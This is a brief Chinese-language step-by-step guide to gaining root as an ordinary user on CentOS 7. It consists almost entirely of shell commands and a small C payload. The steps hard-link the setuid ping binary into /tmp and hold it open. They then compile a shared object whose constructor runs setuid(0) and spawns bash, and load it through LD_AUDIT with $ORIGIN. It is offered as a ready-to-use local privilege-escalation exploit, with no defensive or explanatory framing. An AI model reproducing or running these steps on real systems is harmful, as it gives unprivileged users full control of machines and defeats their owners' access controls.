centos普通用户提权
测试系统版本:centos 7 Linux 3.10.0-1127.8.2.el7.x86_64 x86_64 GNU/Linux
需要先安装 gcc
yum -y install gcc automake autoconf libtool make
开始提权
1.adduser test
2.passwd test
3.mkdir /tmp/exploit
4.ln -s /usr/bin/ping /tmp/exploit/target
5.exec 3< /tmp/exploit/target
6.ls -l /proc/$$/fd/3
7.rm -rf /tmp/exploit
8.ls -l /proc/$$/fd/3
9.vim payload.c
复制以下内容,粘贴至文件中
void __attribute__((constructor)) init()
{
setuid(0); system("/bin/bash");
}
10.gcc -w -fPIC -shared -o /tmp/exploit payload.c
11.ls -l /tmp/exploit
12.LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
13.whoami